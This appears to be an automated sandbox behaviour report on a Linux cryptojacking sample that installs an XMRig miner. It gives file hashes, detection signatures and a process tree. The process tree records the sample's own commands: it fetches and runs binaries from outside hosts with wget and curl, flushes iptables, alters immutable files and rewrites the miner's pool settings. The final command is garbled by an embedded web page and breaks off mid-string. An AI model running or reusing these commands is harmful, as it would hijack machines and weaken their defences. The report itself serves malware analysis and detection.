Analysis
-
max time kernel
15s -
max time network
150s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240226-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240226-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
10/04/2024, 13:08
Behavioral task
behavioral1
Sample
a4000315471cf197c0552aeec0e7afbe0a935b86ff9afe5b1443812d3f7185fa
Resource
ubuntu1804-amd64-20240226-en
Behavioral task
behavioral2
Sample
a4000315471cf197c0552aeec0e7afbe0a935b86ff9afe5b1443812d3f7185fa
Resource
debian9-armhf-20240226-en
Behavioral task
behavioral3
Sample
a4000315471cf197c0552aeec0e7afbe0a935b86ff9afe5b1443812d3f7185fa
Resource
debian9-mipsbe-20240226-en
Behavioral task
behavioral4
Sample
a4000315471cf197c0552aeec0e7afbe0a935b86ff9afe5b1443812d3f7185fa
Resource
debian9-mipsel-20240226-en
General
-
Target
a4000315471cf197c0552aeec0e7afbe0a935b86ff9afe5b1443812d3f7185fa
-
Size
34KB
-
MD5
54130adf66d5bfa4e4b9f04b3933e493
-
SHA1
1c5f5986b92e3392d4cfaa531c88cd06b5cfd361
-
SHA256
a4000315471cf197c0552aeec0e7afbe0a935b86ff9afe5b1443812d3f7185fa
-
SHA512
dc9a8b01fc16686fed8d82a89147cd614a8c6f5a20aa324fd8922cca0a0aa3bf03c2d1407bd5028789864b1a429a31b2bf904a07101bca9d5c76488ec69da82d
-
SSDEEP
768:dBxlT2wDGWvWCrESA+FylT4hxXpGdKI3oB6kX7sdrCIZMfXxK2eJ5tLW:YDSA+Fyl1dRoZ7q9W
Malware Config
Signatures
-
XMRig Miner payload 2 IoCs
resource yara_rule behavioral1/files/fstream-6.dat family_xmrig behavioral1/files/fstream-6.dat xmrig -
Modifies the dynamic linker configuration file 1 TTPs 1 IoCs
Malware can modify the configuration file of the dynamic linker to preload malicous libraries with every executed process.
description ioc Process File opened for modification /etc/ld.so.preload a4000315471cf197c0552aeec0e7afbe0a935b86ff9afe5b1443812d3f7185fa -
Adds new SSH keys 2 IoCs
Linux special file to hold SSH keys. The threat actor may add new keys for further remote access.
description ioc Process File opened for modification /root/.ssh/authorized_keys a4000315471cf197c0552aeec0e7afbe0a935b86ff9afe5b1443812d3f7185fa File opened for modification /root/.ssh/authorized_keys2 Process not Found -
Executes dropped EXE 2 IoCs
ioc pid Process /.dockerenv 1596 .dockerenv /usr/sbin/moneroocean/xmrig 1642 xmrig -
Flushes firewall rules 1 IoCs
Flushes/ disables firewall rules inside the Linux kernel.
pid Process 1578 iptables -
Writes DNS configuration 1 TTPs 1 IoCs
Writes data to DNS resolver config file.
description ioc Process File opened for modification /etc/resolv.conf a4000315471cf197c0552aeec0e7afbe0a935b86ff9afe5b1443812d3f7185fa -
Attempts to change immutable files 13 IoCs
Modifies inode attributes on the filesystem to allow changing of immutable files.
pid Process 1581 chattr 1582 chattr 1641 sed 1649 sed 1650 sed 1652 sed 1726 chattr 1632 sed 1648 sed 1651 sed 1653 sed 1655 sed 1586 chattr -
Checks CPU configuration 1 TTPs 1 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo xmrig -
Checks hardware identifiers (DMI) 1 TTPs 4 IoCs
Checks DMI information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /sys/devices/virtual/dmi/id/product_name xmrig File opened for reading /sys/devices/virtual/dmi/id/board_vendor xmrig File opened for reading /sys/devices/virtual/dmi/id/bios_vendor xmrig File opened for reading /sys/devices/virtual/dmi/id/sys_vendor xmrig -
Enumerates running processes
Discovers information about currently running processes on the system
-
Reads CPU attributes 1 TTPs 5 IoCs
description ioc Process File opened for reading /sys/devices/system/cpu/online xmrig File opened for reading /sys/devices/system/cpu/types xmrig File opened for reading /sys/devices/system/cpu/possible xmrig File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps -
Reads hardware information 1 TTPs 14 IoCs
Accesses system info like serial numbers, manufacturer names etc.
description ioc Process File opened for reading /sys/devices/virtual/dmi/id/board_name xmrig File opened for reading /sys/devices/virtual/dmi/id/board_version xmrig File opened for reading /sys/devices/virtual/dmi/id/board_asset_tag xmrig File opened for reading /sys/devices/virtual/dmi/id/chassis_serial xmrig File opened for reading /sys/devices/virtual/dmi/id/chassis_asset_tag xmrig File opened for reading /sys/devices/virtual/dmi/id/chassis_vendor xmrig File opened for reading /sys/devices/virtual/dmi/id/bios_version xmrig File opened for reading /sys/devices/virtual/dmi/id/product_version xmrig File opened for reading /sys/devices/virtual/dmi/id/board_serial xmrig File opened for reading /sys/devices/virtual/dmi/id/chassis_type xmrig File opened for reading /sys/devices/virtual/dmi/id/chassis_version xmrig File opened for reading /sys/devices/virtual/dmi/id/product_serial xmrig File opened for reading /sys/devices/virtual/dmi/id/product_uuid xmrig File opened for reading /sys/devices/virtual/dmi/id/bios_date xmrig -
Write file to user bin folder 1 TTPs 13 IoCs
description ioc Process File opened for modification /usr/sbin/moneroocean/sedDEEjVH sed File opened for modification /usr/sbin/moneroocean/miner.sh Process not Found File opened for modification /usr/sbin/moneroocean/SHA256SUMS tar File opened for modification /usr/sbin/moneroocean/sedueGpaF sed File opened for modification /usr/sbin/moneroocean/sedieQq3G sed File opened for modification /usr/sbin/moneroocean/sedKBtDsL sed File opened for modification /usr/sbin/moneroocean/sedO5wYYN sed File opened for modification /usr/sbin/moneroocean/config.json tar File opened for modification /usr/sbin/moneroocean/xmrig tar File opened for modification /usr/sbin/moneroocean/sedqjJP2A sed File opened for modification /usr/sbin/moneroocean/sedQd0ofI sed File opened for modification /usr/sbin/moneroocean/config_background.json cp File opened for modification /usr/sbin/.bash_history touch -
Enumerates kernel/hardware configuration 1 TTPs 54 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
description ioc Process File opened for reading /sys/bus/cpu/devices/cpu0/topology/core_id xmrig File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/size xmrig File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/physical_line_partition xmrig File opened for reading /sys/bus/node/devices/node0/access0/initiators xmrig File opened for reading /sys/bus/cpu/devices/cpu0/topology/core_siblings xmrig File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/coherency_line_size xmrig File opened for reading /sys/bus/cpu/devices/cpu0/cache/index5/shared_cpu_map xmrig File opened for reading /sys/fs/cgroup/cpuset/cpuset.cpus xmrig File opened for reading /sys/bus/cpu/devices/cpu0/cache/index1/shared_cpu_map xmrig File opened for reading /sys/bus/cpu/devices/cpu0/cache/index1/level xmrig File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/level xmrig File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/size xmrig File opened for reading /sys/bus/node/devices/node0/cpumap xmrig File opened for reading /sys/fs/cgroup/unified/cgroup.controllers xmrig File opened for reading /sys/bus/cpu/devices/cpu0/topology/die_cpus xmrig File opened for reading /sys/bus/node/devices/node0/hugepages/hugepages-2048kB/nr_hugepages xmrig File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/shared_cpu_map xmrig File opened for reading /sys/bus/node/devices/node0/access0/initiators/read_latency xmrig File opened for reading /sys/bus/cpu/devices/cpu0/cpufreq/cpuinfo_max_freq xmrig File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/shared_cpu_map xmrig File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/physical_line_partition xmrig File opened for reading /sys/bus/cpu/devices/cpu0/cache/index8/shared_cpu_map xmrig File opened for reading /sys/kernel/mm/hugepages xmrig File opened for reading /sys/bus/cpu/devices/cpu0/topology/thread_siblings xmrig File opened for reading /sys/bus/node/devices/node0/meminfo xmrig File opened for reading /sys/bus/dax/devices xmrig File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/level xmrig File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/coherency_line_size xmrig File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/type xmrig File opened for reading /sys/bus/cpu/devices/cpu0/cache/index7/shared_cpu_map xmrig File opened for reading /sys/bus/cpu/devices/cpu0/cache/index4/shared_cpu_map xmrig File opened for reading /sys/bus/cpu/devices/cpu0/cache/index6/shared_cpu_map xmrig File opened for reading /sys/bus/node/devices/node0/access0/initiators/read_bandwidth xmrig File opened for reading /sys/fs/cgroup/cpuset/cpuset.mems xmrig File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/physical_line_partition xmrig File opened for reading /sys/bus/cpu/devices/cpu0/topology/physical_package_id xmrig File opened for reading /sys/bus/cpu/devices/cpu0/cache/index1/type xmrig File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/type xmrig File opened for reading /sys/devices/virtual/dmi/id xmrig File opened for reading /sys/bus/cpu/devices xmrig File opened for reading /sys/bus/cpu/devices/cpu0/cpufreq/base_frequency xmrig File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/number_of_sets xmrig File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/level xmrig File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/type xmrig File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/number_of_sets xmrig File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/shared_cpu_map xmrig File opened for reading /sys/devices/system/node/online xmrig File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/number_of_sets xmrig File opened for reading /sys/kernel/mm/hugepages/hugepages-2048kB/nr_hugepages xmrig File opened for reading /sys/bus/node/devices/node0/hugepages xmrig File opened for reading /sys/bus/node/devices/node0/access1/initiators xmrig File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/size xmrig File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/coherency_line_size xmrig File opened for reading /sys/bus/cpu/devices/cpu0/cache/index9/shared_cpu_map xmrig -
Reads runtime system information 64 IoCs
Reads data from /proc virtual filesystem.
description ioc Process File opened for reading /proc/1232/stat pidof File opened for reading /proc/32/status ps File opened for reading /proc/32/cmdline ps File opened for reading /proc/1164/cmdline ps File opened for reading /proc/508/stat killall File opened for reading /proc/948/stat killall File opened for reading /proc/462/stat pidof File opened for reading /proc/1189/cmdline pidof File opened for reading /proc/7/stat ps File opened for reading /proc/1326/cmdline ps File opened for reading /proc/947/status ps File opened for reading /proc/535/stat killall File opened for reading /proc/27/status ps File opened for reading /proc/168/stat ps File opened for reading /proc/30/cmdline ps File opened for reading /proc/1567/cmdline ps File opened for reading /proc/1134/cmdline pidof File opened for reading /proc/20/stat ps File opened for reading /proc/1084/cmdline killall File opened for reading /proc/1250/status ps File opened for reading /proc/1287/status ps File opened for reading /proc/963/cmdline ps File opened for reading /proc/1037/cmdline ps File opened for reading /proc/1181/stat killall File opened for reading /proc/1307/cmdline ps File opened for reading /proc/13/status ps File opened for reading /proc/628/status ps File opened for reading /proc/25/stat killall File opened for reading /proc/82/stat killall File opened for reading /proc/154/stat pidof File opened for reading /proc/1180/cmdline ps File opened for reading /proc/80/stat killall File opened for reading /proc/1666/stat killall File opened for reading /proc/485/stat pidof File opened for reading /proc/filesystems sed File opened for reading /proc/89/cmdline ps File opened for reading /proc/508/cmdline ps File opened for reading /proc/156/stat ps File opened for reading /proc/1558/cmdline ps File opened for reading /proc/959/cmdline pidof File opened for reading /proc/self/stat systemctl File opened for reading /proc/1563/cmdline ps File opened for reading /proc/1250/stat ps File opened for reading /proc/629/stat ps File opened for reading /proc/480/status ps File opened for reading /proc/10/stat ps File opened for reading /proc/4/stat killall File opened for reading /proc/9/stat pidof File opened for reading /proc/587/cmdline ps File opened for reading /proc/1248/status ps File opened for reading /proc/35/stat killall File opened for reading /proc/647/stat killall File opened for reading /proc/342/stat killall File opened for reading /proc/483/stat pidof File opened for reading /proc/1353/stat pidof File opened for reading /proc/468/status ps File opened for reading /proc/1144/cmdline killall File opened for reading /proc/98/stat pidof File opened for reading /proc/1180/stat pidof File opened for reading /proc/1178/cmdline ps File opened for reading /proc/1147/stat ps File opened for reading /proc/468/stat killall File opened for reading /proc/510/status ps File opened for reading /proc/1150/cmdline ps -
Writes file to tmp directory 3 IoCs
Malware often drops required files in the /tmp directory.
description ioc File opened for modification /tmp/sh-thd.0BAlgU File opened for modification /tmp/sh-thd.FTjPeN File opened for modification /tmp/moneroocean_miner.service
Processes
-
/tmp/a4000315471cf197c0552aeec0e7afbe0a935b86ff9afe5b1443812d3f7185fa/tmp/a4000315471cf197c0552aeec0e7afbe0a935b86ff9afe5b1443812d3f7185fa1⤵
- Modifies the dynamic linker configuration file
- Adds new SSH keys
- Writes DNS configuration
PID:1560 -
/bin/hostnamehostname2⤵PID:1561
-
-
/bin/pidofpidof /usr/bin/systemd2⤵
- Reads runtime system information
PID:1562
-
-
/bin/grepgrep -i "[a]liyun"2⤵PID:1564
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1563
-
-
/bin/grepgrep -i "[y]unjing"2⤵PID:1567
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1566
-
-
/bin/unameuname -m2⤵PID:1571
-
-
/bin/unameuname -m2⤵PID:1572
-
-
/bin/unameuname -m2⤵PID:1573
-
-
/bin/unameuname -m2⤵PID:1574
-
-
/bin/unameuname -m2⤵PID:1575
-
-
/bin/unameuname -m2⤵PID:1576
-
-
/bin/unameuname -m2⤵PID:1577
-
-
/sbin/iptablesiptables -F2⤵
- Flushes firewall rules
PID:1578
-
-
/usr/bin/chattrchattr -ia /etc/resolv.conf2⤵
- Attempts to change immutable files
PID:1581
-
-
/usr/bin/chattrchattr +i /etc/resolv.conf2⤵
- Attempts to change immutable files
PID:1582
-
-
/usr/bin/curlcurl -sLk http://chimaera.cc/data/xmrig/wallet.rotate.suckers.txt2⤵PID:1583
-
-
/bin/unameuname -m2⤵PID:1585
-
-
/usr/bin/chattrchattr -ia / /tmp/ /var/ /var/tmp/2⤵
- Attempts to change immutable files
PID:1586
-
-
/bin/chmodchmod 1777 /tmp/ /var/ /var/tmp/2⤵PID:1587
-
-
/bin/mountmount -o "rw,remount" /2⤵PID:1591
-
-
/bin/rmrm -f /.dockerenv2⤵PID:1592
-
-
/usr/bin/wgetwget -q http://85.214.149.236:443/sugarcrm/themes/default/images/SugarLogic/.../xmr/x86_64 -O /.dockerenv2⤵PID:1593
-
-
/bin/chmodchmod 755 /.dockerenv2⤵PID:1594
-
-
/bin/mountmount -o "remount,exec" /2⤵PID:1595
-
-
/.dockerenv/.dockerenv2⤵
- Executes dropped EXE
PID:1596
-
-
/usr/bin/nprocnproc2⤵PID:1598
-
-
/bin/sleepsleep 22⤵PID:1602
-
-
/usr/bin/sudosudo -n true2⤵PID:1621
-
/bin/truetrue3⤵PID:1622
-
-
-
/usr/bin/sudosudo systemctl stop moneroocean_miner.service2⤵PID:1623
-
/bin/systemctlsystemctl stop moneroocean_miner.service3⤵PID:1624
-
-
-
/usr/bin/killallkillall -9 xmrig2⤵
- Reads runtime system information
PID:1625
-
-
/bin/rmrm -rf /usr/sbin/moneroocean2⤵PID:1626
-
-
/usr/bin/curlcurl -Lk --progress-bar http://85.214.149.236:443/sugarcrm/themes/default/images/SugarLogic/.../xmr/x86_64.tar.gz -o /var/tmp/xmrig.tar.gz2⤵PID:1627
-
-
/bin/mkdirmkdir /usr/sbin/moneroocean2⤵PID:1628
-
-
/bin/tartar xf /var/tmp/xmrig.tar.gz -C /usr/sbin/moneroocean2⤵PID:1629
-
/usr/local/sbin/gzipgzip -d3⤵PID:1630
-
-
/usr/local/bin/gzipgzip -d3⤵PID:1630
-
-
/usr/sbin/gzipgzip -d3⤵PID:1630
-
-
/usr/bin/gzipgzip -d3⤵PID:1630
-
-
/sbin/gzipgzip -d3⤵PID:1630
-
-
/bin/gzipgzip -d3⤵PID:1630
-
-
-
/bin/rmrm /var/tmp/xmrig.tar.gz2⤵PID:1631
-
-
/bin/sedsed -i "s/\"donate-level\": *[^,]*,/\"donate-level\": 1,/" /usr/sbin/moneroocean/config.json2⤵
- Attempts to change immutable files
PID:1632
-
-
/usr/sbin/moneroocean/xmrig/usr/sbin/moneroocean/xmrig --help2⤵PID:1633
-
-
/usr/bin/curlcurl -Lk --progress-bar https://github.com/xmrig/xmrig/releases/download/v6.13.1/xmrig-6.13.1-linux-static-x64.tar.gz -o /var/tmp/xmrig.tar.gz2⤵PID:1635
-
-
/bin/tartar xf /var/tmp/xmrig.tar.gz -C /usr/sbin/moneroocean "--strip=1"2⤵
- Write file to user bin folder
PID:1638 -
/usr/local/sbin/gzipgzip -d3⤵PID:1639
-
-
/usr/local/bin/gzipgzip -d3⤵PID:1639
-
-
/usr/sbin/gzipgzip -d3⤵PID:1639
-
-
/usr/bin/gzipgzip -d3⤵PID:1639
-
-
/sbin/gzipgzip -d3⤵PID:1639
-
-
/bin/gzipgzip -d3⤵PID:1639
-
-
-
/bin/rmrm /var/tmp/xmrig.tar.gz2⤵PID:1640
-
-
/bin/sedsed -i "s/\"donate-level\": *[^,]*,/\"donate-level\": 0,/" /usr/sbin/moneroocean/config.json2⤵
- Attempts to change immutable files
- Write file to user bin folder
PID:1641
-
-
/usr/sbin/moneroocean/xmrig/usr/sbin/moneroocean/xmrig --help2⤵
- Executes dropped EXE
- Checks CPU configuration
- Checks hardware identifiers (DMI)
- Reads CPU attributes
- Reads hardware information
- Enumerates kernel/hardware configuration
PID:1642
-
-
/bin/sedsed -i "s/\"url\": *\"[^\"]*\",/\"url\": \"94.130.12.30:3333\",/" /usr/sbin/moneroocean/config.json2⤵
- Attempts to change immutable files
- Write file to user bin folder
PID:1648
-
-
/bin/sedsed -i "s/\"user\": *\"[^\"]*\",/\"user\": \"<!DOCTYPE" "html><html" "lang=\"en-US\"><head><title>Just" a "moment...</title><meta" "http-equiv=\"Content-Type\"" "content=\"text/html;" "charset=UTF-8\"><meta" "http-equiv=\"X-UA-Compatible\"" "content=\"IE=Edge\"><meta" "name=\"robots\"" "content=\"noindex,nofollow\"><meta" "name=\"viewport\"" "content=\"width=device-width,initial-scale=1\"><style>*{box-sizing:border-box;margin:0;padding:0}html{line-height:1.15;-webkit-text-size-adjust:100%;color:#313131}button,html{font-family:system-ui,-apple-system,BlinkMacSystemFont,Segoe" "UI,Roboto,Helvetica" "Neue,Arial,Noto" "Sans,sans-serif,Apple" Color "Emoji,Segoe" UI "Emoji,Segoe" UI "Symbol,Noto" Color "Emoji}@media" "(prefers-color-scheme:dark){body{background-color:#222;color:#d9d9d9}body" "a{color:#fff}body" "a:hover{color:#ee730a;text-decoration:underline}body" .lds-ring "div{border-color:#999" transparent "transparent}body" ".font-red{color:#b20f03}body" ".big-button,body" ".pow-button{background-color:#4693ff;color:#1d1d1d}body" "#challenge-success-text{background-image:url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIzMiIgaGVpZ2h0PSIzMiIgZmlsbD0ibm9uZSIgdmlld0JveD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjZDlkOWQ5IiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjZDlkOWQ5IiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA5LjQ5NS05LjYtMS40Mi0xLjQwNXoiLz48L3N2Zz4=)}body" "#challenge-error-text{background-image:url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIzMiIgaGVpZ2h0PSIzMiIgZmlsbD0ibm9uZSI+PHBhdGggZmlsbD0iI0IyMEYwMyIgZD0iTTE2IDNhMTMgMTMgMCAxIDAgMTMgMTNBMTMuMDE1IDEzLjAxNSAwIDAgMCAxNiAzbTAgMjRhMTEgMTEgMCAxIDEgMTEtMTEgMTEuMDEgMTEuMDEgMCAwIDEtMTEgMTEiLz48cGF0aCBmaWxsPSIjQjIwRjAzIiBkPSJNMTcuMDM4IDE4LjYxNUgxNC44N0wxNC41NjMgOS41aDIuNzgzem0tMS4wODQgMS40MjdxLjY2IDAgMS4wNTcuMzg4LjQwNy4zODkuNDA3Ljk5NCAwIC41OTYtLjQwNy45ODQtLjM5Ny4zOS0xLjA1Ny4zODktLjY1IDAtMS4wNTYtLjM4OS0uMzk4LS4zODktLjM5OC0uOTg0IDAtLjU5Ny4zOTgtLjk4NS40MDYtLjM5NyAxLjA1Ni0uMzk3Ii8+PC9zdmc+)}}body{display:flex;flex-direction:column;min-height:100vh}body.no-js" ".loading-spinner{visibility:hidden}body.no-js" ".challenge-running{display:none}body.dark{background-color:#222;color:#d9d9d9}body.dark" "a{color:#fff}body.dark" "a:hover{color:#ee730a;text-decoration:underline}body.dark" .lds-ring "div{border-color:#999" transparent "transparent}body.dark" ".font-red{color:#b20f03}body.dark" ".big-button,body.dark" ".pow-button{background-color:#4693ff;color:#1d1d1d}body.dark" "#challenge-success-text{background-image:url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIzMiIgaGVpZ2h0PSIzMiIgZmlsbD0ibm9uZSIgdmlld0JveD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjZDlkOWQ5IiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjZDlkOWQ5IiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA5LjQ5NS05LjYtMS40Mi0xLjQwNXoiLz48L3N2Zz4=)}body.dark" "#challenge-error-text{background-image:url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIzMiIgaGVpZ2h0PSIzMiIgZmlsbD0ibm9uZSI+PHBhdGggZmlsbD0iI0IyMEYwMyIgZD0iTTE2IDNhMTMgMTMgMCAxIDAgMTMgMTNBMTMuMDE1IDEzLjAxNSAwIDAgMCAxNiAzbTAgMjRhMTEgMTEgMCAxIDEgMTEtMTEgMTEuMDEgMTEuMDEgMCAwIDEtMTEgMTEiLz48cGF0aCBmaWxsPSIjQjIwRjAzIiBkPSJNMTcuMDM4IDE4LjYxNUgxNC44N0wxNC41NjMgOS41aDIuNzgzem0tMS4wODQgMS40MjdxLjY2IDAgMS4wNTcuMzg4LjQwNy4zODkuNDA3Ljk5NCAwIC41OTYtLjQwNy45ODQtLjM5Ny4zOS0xLjA1Ny4zODktLjY1IDAtMS4wNTYtLjM4OS0uMzk4LS4zODktLjM5OC0uOTg0IDAtLjU5Ny4zOTgtLjk4NS40MDYtLjM5NyAxLjA1Ni0uMzk3Ii8+PC9zdmc+)}body.light{background-color:transparent;color:#313131}body.light" "a{color:#0051c3}body.light" "a:hover{color:#ee730a;text-decoration:underline}body.light" .lds-ring "div{border-color:#595959" transparent "transparent}body.light" ".font-red{color:#fc574a}body.light" ".big-button,body.light" ".pow-button{background-color:#003681;border-color:#003681;color:#fff}body.light" "#challenge-success-text{background-image:url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIzMiIgaGVpZ2h0PSIzMiIgZmlsbD0ibm9uZSIgdmlld0JveD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA5LjQ5NS05LjYtMS40Mi0xLjQwNXoiLz48L3N2Zz4=)}body.light" "#challenge-error-text{background-image:url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIzMiIgaGVpZ2h0PSIzMiIgZmlsbD0ibm9uZSI+PHBhdGggZmlsbD0iI2ZjNTc0YSIgZD0iTTE2IDNhMTMgMTMgMCAxIDAgMTMgMTNBMTMuMDE1IDEzLjAxNSAwIDAgMCAxNiAzbTAgMjRhMTEgMTEgMCAxIDEgMTEtMTEgMTEuMDEgMTEuMDEgMCAwIDEtMTEgMTEiLz48cGF0aCBmaWxsPSIjZmM1NzRhIiBkPSJNMTcuMDM4IDE4LjYxNUgxNC44N0wxNC41NjMgOS41aDIuNzgzem0tMS4wODQgMS40MjdxLjY2IDAgMS4wNTcuMzg4LjQwNy4zODkuNDA3Ljk5NCAwIC41OTYtLjQwNy45ODQtLjM5Ny4zOS0xLjA1Ny4zODktLjY1IDAtMS4wNTYtLjM4OS0uMzk4LS4zODktLjM5OC0uOTg0IDAtLjU5Ny4zOTgtLjk4NS40MDYtLjM5NyAxLjA1Ni0uMzk3Ii8+PC9zdmc+)}a{background-color:transparent;color:#0051c3;text-decoration:none;transition:color" .15s "ease}a:hover{color:#ee730a;text-decoration:underline}.main-content{margin:8rem" "auto;max-width:60rem;width:100%}.heading-favicon{height:2rem;margin-right:.5rem;width:2rem}@media" "(width" "<=" "720px){.main-content{margin-top:4rem}.heading-favicon{height:1.5rem;width:1.5rem}}.footer,.main-content{padding-left:1.5rem;padding-right:1.5rem}.main-wrapper{align-items:center;display:flex;flex:1;flex-direction:column}.font-red{color:#b20f03}.spacer{margin:2rem" "0}.h1{font-size:2.5rem;font-weight:500;line-height:3.75rem}.h2{font-weight:500}.core-msg,.h2{font-size:1.5rem;line-height:2.25rem}.body-text,.core-msg{font-weight:400}.body-text{font-size:1rem;line-height:1.25rem}@media" "(width" "<=" "720px){.h1{font-size:1.5rem;line-height:1.75rem}.h2{font-size:1.25rem}.core-msg,.h2{line-height:1.5rem}.core-msg{font-size:1rem}}#challenge-error-text{background-image:url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIzMiIgaGVpZ2h0PSIzMiIgZmlsbD0ibm9uZSI+PHBhdGggZmlsbD0iI2ZjNTc0YSIgZD0iTTE2IDNhMTMgMTMgMCAxIDAgMTMgMTNBMTMuMDE1IDEzLjAxNSAwIDAgMCAxNiAzbTAgMjRhMTEgMTEgMCAxIDEgMTEtMTEgMTEuMDEgMTEuMDEgMCAwIDEtMTEgMTEiLz48cGF0aCBmaWxsPSIjZmM1NzRhIiBkPSJNMTcuMDM4IDE4LjYxNUgxNC44N0wxNC41NjMgOS41aDIuNzgzem0tMS4wODQgMS40MjdxLjY2IDAgMS4wNTcuMzg4LjQwNy4zODkuNDA3Ljk5NCAwIC41OTYtLjQwNy45ODQtLjM5Ny4zOS0xLjA1Ny4zODktLjY1IDAtMS4wNTYtLjM4OS0uMzk4LS4zODktLjM5OC0uOTg0IDAtLjU5Ny4zOTgtLjk4NS40MDYtLjM5NyAxLjA1Ni0uMzk3Ii8+PC9zdmc+);padding-left:34px}#challenge-error-text,#challenge-success-text{background-repeat:no-repeat;background-size:contain}#challenge-success-text{background-image:url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIzMiIgaGVpZ2h0PSIzMiIgZmlsbD0ibm9uZSIgdmlld0JveD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA5LjQ5NS05LjYtMS40Mi0xLjQwNXoiLz48L3N2Zz4=);padding-left:42px}.text-center{text-align:center}.big-button{border:.063rem" solid "#0051c3;border-radius:.313rem;font-size:.875rem;line-height:1.313rem;padding:.375rem" "1rem;transition-duration:.2s;transition-property:background-color,border-color,color;transition-timing-function:ease}.big-button:hover{cursor:pointer}.captcha-prompt:not(.hidden){display:flex}@media" "(width" "<=" "720px){.captcha-prompt:not(.hidden){flex-wrap:wrap;justify-content:center}}.pow-button{background-color:#0051c3;color:#fff;margin:2rem" "0}.pow-button:hover{background-color:#003681;border-color:#003681;color:#fff}.footer{font-size:.75rem;line-height:1.125rem;margin:0" "auto;max-width:60rem;width:100%}.footer-inner{border-top:1px" solid "#d9d9d9;padding-bottom:1rem;padding-top:1rem}.clearfix:after{clear:both;content:\"\";display:table}.clearfix" ".column{float:left;padding-right:1.5rem;width:50%}.diagnostic-wrapper{margin-bottom:.5rem}.footer" ".ray-id{text-align:center}.footer" .ray-id "code{font-family:monaco,courier,monospace}.core-msg,.zone-name-title{overflow-wrap:break-word}@media" "(width" "<=" "720px){.diagnostic-wrapper{display:flex;flex-wrap:wrap;justify-content:center}.clearfix:after{clear:none;content:none;display:initial;text-align:center}.column{padding-bottom:2rem}.clearfix" 